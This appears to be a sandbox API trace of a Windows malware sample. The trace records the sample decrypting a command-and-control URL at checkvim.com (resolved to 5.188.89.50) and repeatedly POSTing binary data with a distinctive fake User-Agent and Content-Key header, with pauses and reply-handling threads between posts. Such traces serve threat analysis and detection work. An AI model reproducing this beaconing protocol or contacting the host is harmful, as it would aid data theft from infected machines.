[0306.341] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0306.341] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0306.342] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0306.342] GetProcessHeap () returned 0x840000 [0306.342] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0306.342] GetProcessHeap () returned 0x840000 [0306.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0306.342] send (s=0x508, buf=0x873a58*, len=237, flags=0) returned 237 [0306.342] send (s=0x508, buf=0x87eb58*, len=159, flags=0) returned 159 [0306.342] GetProcessHeap () returned 0x840000 [0306.342] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0306.342] recv (in: s=0x508, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0306.700] closesocket (s=0x508) returned 0 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0306.700] GetProcessHeap () returned 0x840000 [0306.700] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0306.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x6e4) returned 0x508 [0306.702] Sleep (dwMilliseconds=0xea60) [0306.731] GetProcessHeap () returned 0x840000 [0306.731] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0306.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.732] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0306.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.736] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0306.742] GetProcessHeap () returned 0x840000 [0306.742] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0306.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.742] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0306.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.743] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0306.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.744] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.744] GetProcessHeap () returned 0x840000 [0306.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0306.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.745] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0306.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.745] CryptDestroyKey (hKey=0x87e930) returned 1 [0306.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.746] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0306.746] GetProcessHeap () returned 0x840000 [0306.746] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0306.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.749] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.750] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.750] GetProcessHeap () returned 0x840000 [0306.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0306.750] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0306.750] GetProcessHeap () returned 0x840000 [0306.750] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0306.750] GetProcessHeap () returned 0x840000 [0306.750] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0306.750] GetProcessHeap () returned 0x840000 [0306.750] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0306.750] GetProcessHeap () returned 0x840000 [0306.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0306.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.751] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0306.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.755] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0306.760] GetProcessHeap () returned 0x840000 [0306.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0306.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.761] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0306.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.761] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0306.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.762] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.762] GetProcessHeap () returned 0x840000 [0306.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0306.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.763] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0306.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.764] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0306.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.765] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0306.765] GetProcessHeap () returned 0x840000 [0306.765] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0306.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.766] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0306.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.766] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0306.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.767] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0306.767] GetProcessHeap () returned 0x840000 [0306.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0306.767] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0306.768] GetProcessHeap () returned 0x840000 [0306.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0306.768] socket (af=2, type=1, protocol=6) returned 0x50c [0306.769] connect (s=0x50c, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0306.835] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0306.835] GetProcessHeap () returned 0x840000 [0306.835] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0306.835] GetProcessHeap () returned 0x840000 [0306.835] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0306.835] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0306.836] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0306.836] GetProcessHeap () returned 0x840000 [0306.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0306.837] GetProcessHeap () returned 0x840000 [0306.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0306.837] GetProcessHeap () returned 0x840000 [0306.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0306.837] GetProcessHeap () returned 0x840000 [0306.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0306.837] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0306.838] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0306.838] GetProcessHeap () returned 0x840000 [0306.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0306.838] GetProcessHeap () returned 0x840000 [0306.839] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0306.839] send (s=0x50c, buf=0x873a58*, len=237, flags=0) returned 237 [0306.839] send (s=0x50c, buf=0x87eb58*, len=159, flags=0) returned 159 [0306.839] GetProcessHeap () returned 0x840000 [0306.839] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0306.839] recv (in: s=0x50c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0307.193] GetProcessHeap () returned 0x840000 [0307.193] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0307.193] GetProcessHeap () returned 0x840000 [0307.193] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0307.193] GetProcessHeap () returned 0x840000 [0307.193] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0307.193] GetProcessHeap () returned 0x840000 [0307.193] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0307.193] closesocket (s=0x50c) returned 0 [0307.193] GetProcessHeap () returned 0x840000 [0307.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0307.194] GetProcessHeap () returned 0x840000 [0307.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0307.194] GetProcessHeap () returned 0x840000 [0307.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0307.194] GetProcessHeap () returned 0x840000 [0307.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0307.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8d0) returned 0x50c [0307.196] Sleep (dwMilliseconds=0xea60) [0307.202] GetProcessHeap () returned 0x840000 [0307.202] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0307.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.203] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0307.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.208] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0307.214] GetProcessHeap () returned 0x840000 [0307.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0307.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.215] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0307.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.216] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0307.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.217] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.217] GetProcessHeap () returned 0x840000 [0307.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0307.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.218] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0307.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.219] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0307.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.220] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0307.220] GetProcessHeap () returned 0x840000 [0307.220] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0307.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.220] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.221] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.222] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.223] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.223] GetProcessHeap () returned 0x840000 [0307.223] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0307.223] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0307.223] GetProcessHeap () returned 0x840000 [0307.223] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0307.223] GetProcessHeap () returned 0x840000 [0307.223] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0307.223] GetProcessHeap () returned 0x840000 [0307.223] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0307.223] GetProcessHeap () returned 0x840000 [0307.223] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0307.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.224] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0307.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.229] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fd70) returned 1 [0307.234] GetProcessHeap () returned 0x840000 [0307.234] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0307.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.235] CryptImportKey (in: hProv=0x86fd70, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0307.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.236] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0307.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.237] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.237] GetProcessHeap () returned 0x840000 [0307.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0307.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.237] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0307.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.238] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0307.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0307.239] CryptReleaseContext (hProv=0x86fd70, dwFlags=0x0) returned 1 [0307.239] GetProcessHeap () returned 0x840000 [0307.239] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0307.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.240] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0307.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.240] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0307.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.241] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0307.241] GetProcessHeap () returned 0x840000 [0307.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0307.241] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0307.242] GetProcessHeap () returned 0x840000 [0307.242] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0307.242] socket (af=2, type=1, protocol=6) returned 0x510 [0307.243] connect (s=0x510, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0307.312] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0307.312] GetProcessHeap () returned 0x840000 [0307.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0307.312] GetProcessHeap () returned 0x840000 [0307.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0307.313] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0307.314] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0307.314] GetProcessHeap () returned 0x840000 [0307.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0307.314] GetProcessHeap () returned 0x840000 [0307.315] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0307.315] GetProcessHeap () returned 0x840000 [0307.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0307.315] GetProcessHeap () returned 0x840000 [0307.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0307.316] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0307.317] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0307.317] GetProcessHeap () returned 0x840000 [0307.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0307.317] GetProcessHeap () returned 0x840000 [0307.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0307.318] send (s=0x510, buf=0x873a58*, len=237, flags=0) returned 237 [0307.319] send (s=0x510, buf=0x87eb58*, len=159, flags=0) returned 159 [0307.319] GetProcessHeap () returned 0x840000 [0307.319] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0307.319] recv (in: s=0x510, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0307.672] GetProcessHeap () returned 0x840000 [0307.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0307.672] GetProcessHeap () returned 0x840000 [0307.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0307.672] GetProcessHeap () returned 0x840000 [0307.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0307.672] GetProcessHeap () returned 